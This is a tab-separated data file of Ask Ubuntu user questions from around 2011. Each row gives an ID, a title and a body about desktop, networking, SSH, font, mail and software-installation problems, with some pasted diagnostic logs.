32595	gtk theme for unity desktop	i am using ubuntu 11.4 alpha3 for testing . here i am looking that some of application are removed like appearance where we play with theme preferences . how can i change themes in unity ? what is that interface ? during the upgrade process my default ambiance theme got crupted . window decoration are fine but gui widget ( e.g boxes , button , scrollbars ) has now windowish9x look . how can i restore my default ambiance theme ?
32598	how to use xephyr without disabling access control or using xdmcp ?	i want to run a program ( eg xterm ) inside xephyr ( a nested x server ) . most of the instructions say to run `` xephyr :1 -ac '' and then in another session run `` display=:1 xterm '' . this disables access control so anyone can connect to the display . how can i do it without disabling access control ?
32599	reinstall windows as a partition after i have ubuntu	i used to have windows xp on my laptop but switched over to the latest ubuntu version . unfortunately , there are programs that i would like to use on the windows side , but can not because i have no access to it anymore . what is the way to reinstall windows as a partition so that i can dual boot ? is the windows xp install cd and product key the only thing that i need to install windows xp again ? i do n't have a windows recovery cd : ( any help would be grateful . thanks !
32600	ignore files in ubuntu one	i found that i can use : ignore.default = \a # . *\z \a . *~\z \a . *\.py [ oc ] \z \a . *\.sw [ nopx ] \z \a . *\.swpx\z \a\..*\.tmp\z \a . *\.git\z in /etc/xdg/ubuntuone/syncdaemon.conf to ignore files . i 'm not really up on regex so i tried to add the last line to ignore the .git folder . it does n't appear to be working though . anyone have a correct solution ?
32611	extract images from pdf with layer masks	i have pdf file with layer masks ( i.e . transparencies ) and i need to extract transparent layers of images . when i use pdfimages to extract images - both .jpgs and .pngs have same white non-transparent background . imagemagick 's convert a.pdf image- % 04d.png outputs single non-layered file . any help would be appreciated .
32614	access a machine remotely ?	i have a local network of 80 machines , all with ubuntu 10.04 installed on them . all the machines are connected to a central switch . i have some contractors that are located overseas . i would like to dedicate each of them a single machine , so that all the work they do will be performed on one of my 'local ' machines ( through remote access ) . ideally , i 'd prefer a free solution that will allow each of the users to securely connect to a remote machine , view 'x ' ( meaning , be able to open programs like evolution , send emails , write computer code etc ) and also open a terminal , run scripts etc . ideally , the solution should be fast ( meaning , i do n't want a long delay between every punch on their keyboard to when their screen gets updated ) and secure . i should also have the ability to access the machine they 're working on and block their access , in case they 're doing something they 're not supposed to . any ideas ?
32617	10.10 firefox speed problem	firefox browser working very slow in my ubuntu 10.10 . i use mobile to connect either via blue tooth or cable . is any tips to make it fast
32620	does running ubuntu on a dell laptop sold with windows void the warranty ?	if i run ubuntu on a dell laptop which was sold with windows , will that void my warranty ?
32623	how to boot into single-user recovery mode ?	in desktop ubuntu there is handy grub menu , but there is no such menu in ubuntu server . how do i get into recovery ( single-user ) mode on ubuntu server then ?
32624	ugly fonts in netbeans - how can i make it use the system font ?	i 'm having problems getting the netbeans font to look nice , this has been a problem ever since i tried ubuntu ~8 . for some reason fonts look like they 're not getting subpixel smoothing in netbeans only , for the rest of the applications they look perfect . look at how ugly the screenshot is : it 's not just the code area but every font in the application looks this way . i was looking around and apparently adding the following line to the .bashrc file should fix the issue but in my case it did n't : export _java_options='-dawt.usesystemaafontsettings=lcd' it think it might only affect java based applications , but i have n't been able to test another java app to check the fonts out . does anyone know what can i do to fix this ? how can i make netbeans use the system font ? thanks in advance !
32627	wireless n capable ralink rt2860sta does n't go faster than 54mbit	wireless n network speed does n't go faster then 54m in ubuntu with router being rigth next to the computer . i get around 200-220m in windows . os : ubuntu 10.10 64 bit . router : wireless n router card : wireless n card i do n't use network manager applet , card is configured manually in /etc/network/interfaces mmmm . so - i probably screwed something up : ) /etc/network/interfaces content : auto wlan0 lo iface eth0 inet static address 192.168.10.197 netmask 255.255.255.0 network 192.168.10.0 broadcast 192.168.10.255 gateway 192.168.10.1 iface wlan0 inet static address 192.168.10.194 netmask 255.255.255.0 network 192.168.10.0 broadcast 192.168.10.255 gateway 192.168.10.1 wpa-ssid mynet wpa-psk somepassword iface lo inet loopback sudo iwconfig result : *lo no wireless extensions . eth0 no wireless extensions . wlan0 ralink sta essid : '' mynet '' nickname : '' rt2860sta '' mode : managed frequency=2.437 ghz access point : 00:14 : d1 : c5 : ac : cc bit rate=54 mb/s rts thr : off fragment thr : off encryption key : e7f8-8c84-5026-bfd1-1774-d4f9-0a5d-408a link quality=100/100 signal level : -25 dbm noise level : -71 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 vboxnet0 no wireless extensions . * so ica n't figure out why it does n't get any faster than 54m . help update mmm . it looks like iwconfig is a legacy utility . this is what i found on the internets : '' iwconfig is a legacy utility . if i were you i 'd uninstall it and try to learn to use iw properly . nothing new will be added through iwconfig any more . using iwconfig is fine but do not expect to gain new features . iwconfig knows nothing about 802.11n and it will remain that way . '' does any one know how to check throughput propperly in linux ?
32628	i am writing an iphone notes client , can i integrate it with ubuntu one ?	first , i 'm not sure if this is the correct venue to be asking this question , so if not , i apologize . i 'm a big fan of tomboy notes and the ability to sync them with ubuntuone . i like having my notes accessible across all of my computers , and would like to be able to do the same thing on my phone . i know there is a client for android , but from what i could tell , no such client exists for iphone . i 'd been meaning to play around with learning some iphone development anyway , so i did some reading on ios development , spent some time , and wrote an application that does most everything that i use tomboy for . it can link to your ubuntu one account , sync notes back and forth , and it supports the majority of the formatting ( bold , underline , highlight , etc . ) options . i 'm sure that someone more experienced in ios development could have done a better job , but it seems to work well enough for what i need . i 'd like to put it in the apple app store for free and make the source available ( as i 'm sure it could stand to be fixed and refined by someone more knowledgeable than myself ) , but i 'm not sure what the rules are for such a thing . right now i 've just got it on my own computers and have n't gone to the trouble to pay to enter the apple developer program because i have some questions about whether i can do so , before i spend the money . as it stands right now , i 've used the ubuntu font in the application ( font.ubunu.com ) , as well as some mentions of ubuntu itself and the ubuntu one logo . i suspect the use of the font is probably okay , but i have my doubts about the logo , so some rebranding might be necessary . more than that , am i even allowed to access the ubuntu one notes service in this way ? i know ubuntu has some mobile applications for syncing other ubuntu one services ( music , contacts , etc . ) , but i could n't find mention of notes , and as i said before , i know that tomboy and tomdroid are already utilizing ubuntu one as a sync destination . basically , i was hoping someone might either know the answers to some of these questions , or be able to point me toward someone who does . obviously i can just continue using this application for myself as it does what i wanted , but i thought it might be nice to make it available for other people and , if someone more knowledgeable about ios development were so inclined , to improve it . sorry this was a bit long , and thanks ! adam
32630	how do i stop ubuntu one from syncing when i login ?	how do i stop ubuntu one from syncing on start up of computer
32631	how to configure firefox from terminal ?	is it possible to configure firefox from terminal ? for example if i want to set toolkit.networkmanager.disable=true in about : config can i do it from terminal ?
32632	where to start ? how to start ?	i 'm new to ubuntu . i want to learn about it , and i want do this as fast as posible . but i do n't know whether to read a book , or try to solve my problems when they arise . i will appreciate if anyone can help me to do the right thing .
32633	is there a disk mounter indicator ?	well - just because i can not find this asked anywhere else on the net - is there something like a `` disk mounter '' applet for unity interface , or are there any alternatives ? ( by 'alternatives ' i mean : i would n't mind doubleclicking an icon , and have what used to be a toolbar applet start up as a separate window ; as long as do n't have to grapple with mount command lines , and filesystem arguments and such . )
32637	all the ppa in software center has been removed	all my ppas are gone . thats why i cant install any other updates because the repositories are unavailable . what should i do to bring the repositories back ? what command lines or methods should i use ? thank you .
32646	how to change the bus / dev in order to allow xsane to work	i am rather new to fixing problems ; no one seems to be able to give me any guidance so i am turning to you . i have just installed the scanner drivers for my mfc5460cn . everything is okay except for the connection . lsusb shows my machine at bus 002 device 005 : id 04f9:01b7 brother industries , ltd mfc-5460cn remote setup however , xsane is searching for it at bus 1 dev 1 . how do i reconcile this ? how can i change bus / dev ?
32650	why is the second windows partition mounted under /host	probably i could read it somewhere , but could n't find anywhere . in windows 7 , i have had two partitions ( `` disk c '' and `` disk d '' ) . after installing dual-boot ubuntu , i can access disk c under /media/windows , which is what i expect : disks are mounted under /media . my two external hard drives are also found there . however , disk d is mysteriously mounted as /host . why ? can i change it ( to put disk d under /media as well ) ? with mountmanager 0.2.6 : both disks c and d are ntfs-3g .
32654	how do i find the boot parameters used by the running kernel ?	is there a way to find out with what parameters did the kernel boot ? for example if i specify noexec=off at the grub command line ? can i see this sort of info after the system has finished booting ?
32658	how to make unity 2d dash background blurry transparent using qt code ?	how to make unity 2d dash background blurry transparent using qt code ?
32659	how to change file permission of a file permanently that is set back to default on boot	i have a file /var/logs/apache2/error.log . and every time i boot , its file permission is changed to default ( unwritable ) by the system . so , i have to run chmod command every time i boot-up . how to change it 's file permission permanently .
32667	how do i configure unity 2d ?	there are several options to configure unity 3d via `` compizconfig settings manager '' respectively its `` ubuntu unity plugin '' . but how do i access unity 2d 's settings ? if you are looking to configure unity 3d see this question : how can i configure unity ?
32673	switching graphics in ubuntu ati	will switching graphics be supported in ubuntu in the near future ? i have a hp dv6 with an ati 5650 , but it only get reconiced as a ati 4200 , that means really bad performance . i read that this is beacuse this computer uses switching graphics and this is not supported in ubuntu . any hope that this will be fixed ?
32674	unix env command ca n't find file even though its in the current directory	i 'm having a problem with calling env from the terminal . i 'm running the latest ubuntu os . here 's what happens : $ ls disarm.ss hereis.ss mat.ss readme sg.ss start-test syntax.ss $ env schemeheapdirs=/usr/lib/csv8.1/i3le sg.ss env : sg.ss : no such file or directory i have checked that the path /usr/lib/csv8.1/i3le is correct . here are the permissions of the files in this dir : $ ls -l total 60 -rw -- -- -- - 1 dtdannen dtdannen 17375 2011-03-29 23:05 disarm.ss -rw -- -- -- - 1 dtdannen dtdannen 9410 2011-03-29 23:05 hereis.ss -rw -- -- -- - 1 dtdannen dtdannen 9955 2011-03-29 23:05 mat.ss -rw -- -- -- - 1 dtdannen dtdannen 394 2011-03-29 23:05 readme -rwxrwxrwx 1 dtdannen dtdannen 2801 2011-03-29 23:05 sg.ss -rwx -- -- -- 1 dtdannen dtdannen 137 2011-03-29 23:05 start-test -rw -- -- -- - 1 dtdannen dtdannen 678 2011-03-29 23:05 syntax.ss i ca n't seem to figure out why env can not find 'sg.ss ' . is it a problem with permissions ? i know you should rarely if ever 'chmod 777 ' on a file ( here i did so on sg.ss ) , but i just wanted to see if that would make it work . i need to call this command within a python program , not directly via command line , but i get the same error in both cases , so i used the terminal as my example . any and all advice is appreciated : ) p.s . i searched so for at least 20 minutes and could n't find a similar post . hope i 'm not re-asking something . edit : tried the same thing but with ./sg.ss instead of just sg.ss ( still did n't work , same error : ( )
32685	formatted and lost 6 years worth of photo memories.. any way to get this back ?	i usually back up before formatting and doing a re-installation of ubuntu , it was in the process and then obviously stopped prematurely but i was thinking all my data was transferred . after installing formatting the drive and sticking a fresh ubuntu on there i proceed to transfer the files from my memory stick to my hard drive , some files are there but most of my 6 years worth of pictures are gone . is there any way i can get these back ? i do n't know what to do , i feel absolutely crap : / any help would be very appreciated .
32688	desktop effects could not be enabled with intel 82g35	i moved an ubuntu installation ( i.e the hard drive ) to a new machine , and while everything went alright , i had to delete xorg.conf to get x running . now , gnome is running fine , but i ca n't get desktop effects to work . here 's my lspci specs : 00:02.0 vga compatible controller : intel corporation 82g35 express integrated graphics controller ( rev 03 ) ( prog-if 00 [ vga controller ] ) subsystem : intel corporation device d701 flags : bus master , fast devsel , latency 0 , irq 44 memory at e0200000 ( 32-bit , non-prefetchable ) [ size=1m ] memory at d0000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at 3440 [ size=8 ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915 kernel modules : i915 [ /code ] i tried working with the suggestion in this page : how to enable intel graphics driver for ubuntu 10.10 but to no avail . any help/further information i need to supply would be welcomed .
32691	what do you use to edit microsoft word documents ( docx ) ?	what alternatives exist for editing microsoft word documents ( docx ) ? i know about openoffice and google docs . what else is out there ?
32695	what php & xdebug based editors do people use other than eclipse , netbeans ( anything java based ) or vim	what editor do people here use in linux ? i want xdebug support but i do n't want something java based ( eclipse , netbeans , etc ) nor do i really want to use vim . any native gtk based editor/sdk that supports php & xdebug would be awesome .
32696	sendmail configuration	i have done the fol­low­ing : install send­mail and con­fig­ure /etc/mail/sendmail.mc by adding line : daemon_options ( ‘family=inet , name=mta-v4 , port=smtp , addr=127.0.0.1′` ) dnl configure joomla mail server set­ting = send­mail php.ini : sendmail_path = /usr/sbin/sendmail –i –t mail server only work­ing if i send email from local server , but when am try­ing send email from web­site via inter­net that not work­ing ! any help information : -i have a public ip and domain name . -website and mail server ( sendmail ) in same server with ubuntu os i got the following error : phpmailer_execute/usr/sbin/sendmail , and i tried configure mail server in joomla to php mail function : could not instantiate php mail function
32703	determining the geometry parameters of a running terminal	i have a terminal running on the desktop and i would like to determine it 's size and coordinates . i 'd like to get the parameters in the format required for gnome-terminal -- geometry is there any file or variable that holds the geometry parameters of a running terminal ? thanks
32706	profile error when launching google-chrome	whenever i launch google-chrome , a window is displayed which contains this message : your profile could not be opened correctly . some features may be unavailable . please check that the profile exists and you have permission to read and write its contents . what is the source of this problem ?
32708	unable to suspend with fglrx enabled	i am unable to suspend in a fully updated ( as of yesterday , 29 march 2011 ) ubuntu 10.10 installation ( kernel 2.6.35-28 ) . following is a list of some of my hardware : motherboard : gigabyte ga-x58a-ud3r video : radeon hd-567x-ynf3 initially , when i went to either suspend or hibernate the machine would almost go into suspend , but it would never power down . instead it would bounce back to the login screen . this was due to a problem with the usb3 ports being unable to suspend ( noticed this in /var/log/kern.log ) . disabling the usb3 ports in the bios fixed this issue . now suspend and hibernate power down the machine . it successfully awakens from hibernate . however , it will not return from suspend . the mouse and keyboard are not powered and the monitor has no signal . these devices are still not powered after a restart . i must power-cycle the machine . the pm-suspend log ends after it states that it entered suspend ( i.e . there is no information any resume code running ) . i discovered that acpitool -s suspends the machine and resumes successfully exactly once . the second time the machine will not resume . i am not sure how these two tools handle suspend differently . update : the problem was introduced somewhere between 2.6.35-22 and 2.6.35-28 . i have both kernels install presently . suspend works fine with 2.6.35-22 but not with 2.6.38-28 .
32710	google chrome extension install failure	i want to install googlechrome extension yet whenever i click install it says extension install failure . invalid value for 'permissions [ 0 ] ' . what causes that ? thank you .
32713	what 's the difference between python-minimal and python-all ?	basically the question . i need to setup an environment that supports tkinter programming in python and maybe some network socket stuff too . i 'd also like to emphasize that i need python 3 .
32718	will gnome shell need compositing ( like unity does ) ?	i fix computers to get a little extra money . i 'm planning to buy a removable hard drive to carry important programs and stuff and i 'd like to install ubuntu 11.04 in it too . so , i ca n't install proprietary graphic drivers in it , so unity 3d is out of question . can i run gnome shell without installing drivers when i boot it in a nvidia or ati graphics computer ?
32719	running online banking in gnucash	i have installed gnucash 2.2.9 that came with ubuntu lucid 10.4 distribution . the accounting software works fine , but i can not get online banking to work . i can open tools/online banking setup , and start the aqbanking wizard that opens the configuration page . i then select the : backends '' tab , select : aqofxconnect '' , click apply . i then go to the 'users '' tab to begin to select a user , and that is when the configuration page disappears ! from synaptic package manger , i seem to have all the necessary packages ( believe they are included and enabled by default in lucid ) , although i do not have a package named aqofxconnect . is this a necessary dependency that is missing and needs to be installed ? or am i experiencing some other problem ? does something else need to be installed or enabled ? any suggestions , ideas are appreciated .
32720	how to downgrade gcc from 4.4.4 to 4.2.1 ?	the newest ubuntu ( 10.10 ) has gcc version 4.4.4 , but i need 4.2.1 for compilation issues . the library that i 'm using requires me to use 4.2.1 . how can i downgrade the gcc to a specific version ?
32722	laptop-mode-tools and harddrive spinoff	so i wanted to extend my laptop battery life . after googleing a lot i found many tips and tricks . some even in this site as well . then i found this package in synaptic as well laptop-mode-tools . now i am not well aware of what harddrive spinoffs are , so i have a dilemma of installing this package as it seems to remove acpi support as well . so my question is , how reliable is this package in battery life extension and what configurations should i use with it ? also i stumbled upon some posts saying spinoffs may kill the harddrive as well . so can anyone clearify with some configuration tips especially for laptop-mode-tools . thanks in advance
32725	ssh pubkey authentication works only if another session is already open	permissions are set correctly on the server ( chibi ) . if i do not have an existing ssh session open to the server , then all new sessions require a password . however if there 's already one open , additional ssh sessions authenticate with pubkey correctly . my $ home is on an sd card . i moved authorized_keys to / and linked it , but that did n't resolve the issue . no sessions open : ting @ core [ 0 ] [ 09:11:32 ] : ~ $ ssh-add -l ssh-rsa aaaab3nzac1yc2eaaaadaqabaaabaqdxryefdri18qtlkfmt/qk5dbzmk5ajmgiv4+juywttl1detzas/hoikocqbib5ul+/snrgifbyv1jqiilaidxnwe1nsnck6umagrrackpxyeqiygh9ha5pf7anvdx2slwdsxu42qkogmvaholpqfzq4r/xitmr8fbdzngkyet+yepm9b69wsl2d3xwpmd+enqiqxuuoxisvmxdxisc8i4qff6ms4jmx1s6hxbnvukg/4dgj7x07m4cm6rbxvgxny2kbmhhoy45v/lplf8pey+af0zxyw+na3mlg2wmayocnwxkj/9tqlpyicuhhtr4wgmgzplwpsyyhyzhgp951ozp /home/ting/.ssh/id_rsa ting @ core [ 0 ] [ 09:12:35 ] : ~ $ ssh -v chibi openssh_5.5p1 debian-4ubuntu5 , openssl 0.9.8o 01 jun 2010 debug1 : reading configuration data /etc/ssh/ssh_config debug1 : applying options for * debug1 : connecting to chibi [ 192.168.1.2 ] port 22. debug1 : connection established . debug1 : identity file /home/ting/.ssh/id_rsa type 1 debug1 : checking blacklist file /usr/share/ssh/blacklist.rsa-2048 debug1 : checking blacklist file /etc/ssh/blacklist.rsa-2048 debug1 : identity file /home/ting/.ssh/id_rsa-cert type -1 debug1 : identity file /home/ting/.ssh/id_dsa type -1 debug1 : identity file /home/ting/.ssh/id_dsa-cert type -1 debug1 : remote protocol version 2.0 , remote software version openssh_5.5p1 debian-4ubuntu5 debug1 : match : openssh_5.5p1 debian-4ubuntu5 pat openssh* debug1 : enabling compatibility mode for protocol 2.0 debug1 : local version string ssh-2.0-openssh_5.5p1 debian-4ubuntu5 debug1 : ssh2_msg_kexinit sent debug1 : ssh2_msg_kexinit received debug1 : kex : server- > client aes128-ctr hmac-md5 none debug1 : kex : client- > server aes128-ctr hmac-md5 none debug1 : ssh2_msg_kex_dh_gex_request ( 1024 < 1024 < 8192 ) sent debug1 : expecting ssh2_msg_kex_dh_gex_group debug1 : ssh2_msg_kex_dh_gex_init sent debug1 : expecting ssh2_msg_kex_dh_gex_reply debug1 : host 'chibi ' is known and matches the rsa host key . debug1 : found key in /home/ting/.ssh/known_hosts:37 debug1 : ssh_rsa_verify : signature correct debug1 : ssh2_msg_newkeys sent debug1 : expecting ssh2_msg_newkeys debug1 : ssh2_msg_newkeys received debug1 : roaming not allowed by server debug1 : ssh2_msg_service_request sent debug1 : ssh2_msg_service_accept received debug1 : authentications that can continue : publickey , password debug1 : next authentication method : publickey debug1 : offering public key : /home/ting/.ssh/id_rsa debug1 : authentications that can continue : publickey , password debug1 : trying private key : /home/ting/.ssh/id_dsa debug1 : next authentication method : password ting @ chibi 's password : one session already connected , opening second session : ting @ core [ 0 ] [ 09:14:14 ] : ~ $ ssh-add -l ssh-rsa aaaab3nzac1yc2eaaaadaqabaaabaqdxryefdri18qtlkfmt/qk5dbzmk5ajmgiv4+juywttl1detzas/hoikocqbib5ul+/snrgifbyv1jqiilaidxnwe1nsnck6umagrrackpxyeqiygh9ha5pf7anvdx2slwdsxu42qkogmvaholpqfzq4r/xitmr8fbdzngkyet+yepm9b69wsl2d3xwpmd+enqiqxuuoxisvmxdxisc8i4qff6ms4jmx1s6hxbnvukg/4dgj7x07m4cm6rbxvgxny2kbmhhoy45v/lplf8pey+af0zxyw+na3mlg2wmayocnwxkj/9tqlpyicuhhtr4wgmgzplwpsyyhyzhgp951ozp /home/ting/.ssh/id_rsa ting @ core [ 0 ] [ 09:14:17 ] : ~ $ ssh -v chibi openssh_5.5p1 debian-4ubuntu5 , openssl 0.9.8o 01 jun 2010 debug1 : reading configuration data /etc/ssh/ssh_config debug1 : applying options for * debug1 : connecting to chibi [ 192.168.1.2 ] port 22. debug1 : connection established . debug1 : identity file /home/ting/.ssh/id_rsa type 1 debug1 : checking blacklist file /usr/share/ssh/blacklist.rsa-2048 debug1 : checking blacklist file /etc/ssh/blacklist.rsa-2048 debug1 : identity file /home/ting/.ssh/id_rsa-cert type -1 debug1 : identity file /home/ting/.ssh/id_dsa type -1 debug1 : identity file /home/ting/.ssh/id_dsa-cert type -1 debug1 : remote protocol version 2.0 , remote software version openssh_5.5p1 debian-4ubuntu5 debug1 : match : openssh_5.5p1 debian-4ubuntu5 pat openssh* debug1 : enabling compatibility mode for protocol 2.0 debug1 : local version string ssh-2.0-openssh_5.5p1 debian-4ubuntu5 debug1 : ssh2_msg_kexinit sent debug1 : ssh2_msg_kexinit received debug1 : kex : server- > client aes128-ctr hmac-md5 none debug1 : kex : client- > server aes128-ctr hmac-md5 none debug1 : ssh2_msg_kex_dh_gex_request ( 1024 < 1024 < 8192 ) sent debug1 : expecting ssh2_msg_kex_dh_gex_group debug1 : ssh2_msg_kex_dh_gex_init sent debug1 : expecting ssh2_msg_kex_dh_gex_reply debug1 : host 'chibi ' is known and matches the rsa host key . debug1 : found key in /home/ting/.ssh/known_hosts:37 debug1 : ssh_rsa_verify : signature correct debug1 : ssh2_msg_newkeys sent debug1 : expecting ssh2_msg_newkeys debug1 : ssh2_msg_newkeys received debug1 : roaming not allowed by server debug1 : ssh2_msg_service_request sent debug1 : ssh2_msg_service_accept received debug1 : authentications that can continue : publickey , password debug1 : next authentication method : publickey debug1 : offering public key : /home/ting/.ssh/id_rsa debug1 : server accepts key : pkalg ssh-rsa blen 279 debug1 : authentication succeeded ( publickey ) . debug1 : channel 0 : new [ client-session ] debug1 : requesting no-more-sessions @ openssh.com debug1 : entering interactive session . debug1 : sending environment . debug1 : sending env lang = en_us.utf8 .bashrc executed . .bash_aliases executed . ting @ chibi [ 0 ] [ 14:14:41 ] : ~ $ diff between the two sessions : ting @ core [ 0 ] [ 09:20:47 ] : ~ $ diff ssh1.txt ssh2.txt 36,39c36,37 < debug1 : authentications that can continue : publickey , password < debug1 : trying private key : /home/ting/.ssh/id_dsa < debug1 : next authentication method : password < debug1 : authentication succeeded ( password ) . -- - > debug1 : server accepts key : pkalg ssh-rsa blen 279 > debug1 : authentication succeeded ( publickey ) . 53,54c51,52 < transferred : sent 2216 , received 8360 bytes , in 11.2 seconds < bytes per second : sent 198.2 , received 747.7 -- - > transferred : sent 2712 , received 7464 bytes , in 9.1 seconds > bytes per second : sent 298.4 , received 821.3 file permissions : drwx -- -- -- 2 ting ting 4.0k 2011-03-30 14:00 .ssh/ -rw -- -- -- - 1 ting ting 404 2011-03-30 14:00 authorized_keys -rw -- -- -- - 1 ting ting 132 2011-03-23 02:47 environment -rw-r -- r -- 1 ting ting 4.4k 2011-03-25 11:59 known_hosts ting @ chibi [ 0 ] [ 23:57:13 ] : ~/.ssh $
32727	how do i turn off font pixel antialiasing only in terminal ?	for programming , i like to turn off font antialiasing ( i.e . select the monochrome option ) because it makes the terminal text look a lot sharper at smaller font sizes . but then everything in the web browser looks worse . is there a way to have the best of both worlds , and have non-antialiased terminal fonts , but antialiased web browser fonts ?
32730	how to remove postgres from my installation ?	i have ubuntu 9.10 ( karmic ) , and when i attempted to install a new program , the postgres was installed as a dependency of that program , no problem at all if the installation occurs with success , but there was an error , and the postgres was not installed and the application is not working . i had tryed to update the postgres and nothing , only the message `` there was an error and your postgres can not be installed '' now i want to remove completely the postgres from my machine , how can i do that , i do not want to kill the process every boot . i just want to remove postgres . what is the command line ? thanks people .
32737	ubuntu and windows together	i have ubuntu and windows installed together . i want to reinstall ubuntu but i need to add some space from windows d : disk . is there any chance in losing data and if not please give me instructions . ubuntu installer using gparted , yeah ? is there any difference between if i resize d : disk or while installing ?
32741	ad hoc 'logmein rescue ' style remote desktopping ?	i want to support windows users by viewing and controlling their desktops remotely in a simple , hassle-free way a la logmein rescue . is this possible ? scenario : hapless windows user : `` geoff 9100 , please , please help me . i have a virus and it 's wiping my files and making me sad . '' geoff 9100 : `` no problem . i 'm a windows virus-killing ninja . go to this website : www.helpmepleasegodhelpmeescapethiswindowspain.com '' [ a plugin , program , script of some kind implants something or other which enables rdp or vnc or somesuch technology enabling easy location and connection . ] hwu : `` geoff 9100 , this is amazing ! you 're controlling my screen as if you 're using my mouse and keyboard ! your amazing ! i 'm finding myself becoming attracted to you as i watch your deft virus-killing skills saving my bacon . what 's your number ? maybe we can get some coffee sometime of something . a movie maybe or you know , something . ''
32749	how to create a user with root privileges in bash ?	i have run the following commands : sudo groupadd -r testgroup sudo useradd -g testgroup -m -r testuser notice the -r option , which according to the man page : -r create a system account . assuming i have a user account with root privileges , i then run : sudo -u testuser cat /dev/input/mouse0 however , i get : cat : /dev/input/mouse0 : permission denied running the same command as root provides the expected output ( garbled output from the mouse driver ) . how can i create a user with root privileges ?
32751	`` advanced '' ubuntu links	i have an intermediate baseline experience with the linux os/features and functions in general . that is i understand commands like cat/grep etc and know what a bash shell is . i am a software developer by trade ( win os but i understand programming language concepts ) so i am familiar with code files etc . i have been using ubuntu ( maverick ) lately for a legacy macbook which i can speedily do daily tasks such as ask questions on askubuntu and check emails . what i am looking for is to go some levels deeper into what makes up the ubuntu os . some examples of things i would like to look at are : the finer details of the gnome ui ( and gtk ) - which files `` drive '' the ui and control at a granular level . more in depth details about how drivers and libraries work together to allow all of my peripherals to work seamlessly when plugged in . in essence i am looking for a reference that is not how to log-in , update themes , install apps/sources etc . i am looking for a level deeper . google is providing me with too much information and i have not come across a suitable reference . what good electronic resources are available ( eg links , ebooks ) which will be suitable for a `` post '' beginner which you have found useful ?
32759	barcode font does n't render properly	i use a barcode font that came with my pos software for printing labels and price tags . i have a database set up in libreoffice that prints a report with the barcodes . however , not all of the glyphs print the barcode . instead , ubuntu substitutes a sans-serif character . ( for example , i need to print the barcode character mapped to the ' # ' sign , but instead , i get a ' # ' sign ) i found this is a linux issue , not an issue with libreoffice . i read some older web pages about xfts and freetype . but it seems those are out dated and now truetype support is already integrated into ubuntu . is this correct or do i still need to configure something ? *note this font works for all glyphs in windows . it is ubuntu that only recognizes certain glyphs properly . the barcode font in question is called 39251.ttf ( note , i get an error from fontforge that a postscript name can not be a number , perhaps that is part of the problem ? ) thanks in advance .
32763	script to upload to internet archive ( archive.org )	is there a script somewhere that will allow me to upload files to an archive.org project ? i 'd like to be able to simply run a script on a folder and have it upload and then spit out a list of urls , for free , permanent , file hosting .
32764	using alt + keycode for accents ?	in windows , we can use alt+keycode ( for example , 130 ) to get an e acute , but it does not work this way in ubuntu/debian . is it possible to have the same keycodes work in ubuntu ?
32766	are x11 bitmapped fonts necessary ?	are the x11 100 and 75 dpi fonts absolutely necessary ? if ubuntu has truetype support , ( as well as opentype ) why do i need all those bit-mapped fonts hanging around ? can i delete them ? ( and/or generate ttf/ot versions for those i want to keep ) if i delete those fonts , will some ancient primitive packages still be looking for them and crash , or will i just get a substituted system default ? i 've already read this topic : what fonts are absolutely required ? answers were not really informative enough and kind of vague . i 'm hoping my questions are more specific so i get a more definitive idea of just what the font system requires and does not .
32767	what new features does gtk+3.0 introduce ?	and how will it improve other gtk themes such as ambiance or elementary ?
32769	what would make a font available for desktop options , but not in an app like libreoffice ?	i 've installed the truetype version of the lucida grande font from my mac . it seems to show up fine when setting desktop options for screen , system , document , menu , titlebar , etc . however , it will not show up in the font list in libreoffice for anything . i 've rebuilt the font cache several times . any other font works for both just fine , just not this one . any ideas as to what would cause this ?
32774	how do i enable video chat in empathy for msn and yahoo ?	video chat is always greyed out in empathy ( yahoo and msn contacts have the same issue ) ( 2.32.1 ) , however , video chat in skype ( beta ) works 100 % perfectly .
32777	nautilus icon missing ( after uninstalling macbuntu 10.10 customization pack )	after using macbuntu 10.10 theme for a while , i uninstalled it using supplied uninstall.sh file , and now nautilus icon is missing , and none of the icon theme is showing it . i also found that the launcher of nautilus i.e . nautilus-browser.desktop is missing in /usr/share/applications/ folder . now icon looks like that of binary file 's icon instead of nautilus ' . how can i revert this icon back to normal ...
32779	are there plans to remove the mouse cursor in utouch ?	i notice in the demo video of utouch that the standard mouse pointer is still showing . are there plans to remove the mouse cursor ? this is one of the most annoying things when using touch technology on pc tablets . this was also my issue with the android port for pc . people with touch screen device 's do n't want an annoying cursor to show anywhere on the screen because , it 's distracting . touch technology needs to seem natural and allow the user to interact with objects on the screen much like objects in the physical world . do n't get me wrong , i love ubuntu and that is all i run on my pc 's . however when you see a 2 or 3 year old using an apple ipad without having to be taught to interface with it , you know you have designed a great ui experience . it 's great to see this coming into reality on ubuntu keep up the good work . are their plans to make ubuntu\utouch more natural for touch device users ?
32781	manually installing python 2.6 ?	ubuntu 8.04 comes with python 2.5 and no 2.6 package support in the apt-get ecosystem . searching around i found http : //www.saltycrane.com/blog/2008/10/installing-python-26-source-ubuntu-hardy/ and all went well except i got a few more missing modules than the article reports ; failed to find the necessary bits to build these modules : _bsddb bsddb185 dbm dl imageop sunaudiodev to find the necessary bits , look in setup.py in detect_modules ( ) for the module 's name . im pretty sure i want/need dl . i know it 's deprecated starting with 2.6 , but it should still be there . overall im finding it very difficult to get 2.6 installed . i would ideally like to replace it ( point /usr/bin/python at 2.6 ) but looking in 2.5 site-packages and seeing symlinks to a 'pyshared ' directory , etc . makes me fear that things will break terribly . i also tried to setup a virtualenv on another , 2.6 capable machine and copied over the virtualenv but it can not execute the python binary ... . idunno . im really just trying to get 2.6 installed to run a django project . nothing more , so it does n't have to replace the system python but if it can work , it 'd be nice .
32783	where is firefox button for firefox 4 for ubuntu ?	i have just installed firefox 4 from the ubuntu software center , but i do n't see new firefox button . is it removed for the ubuntu version ? if not how do i make it visible ?
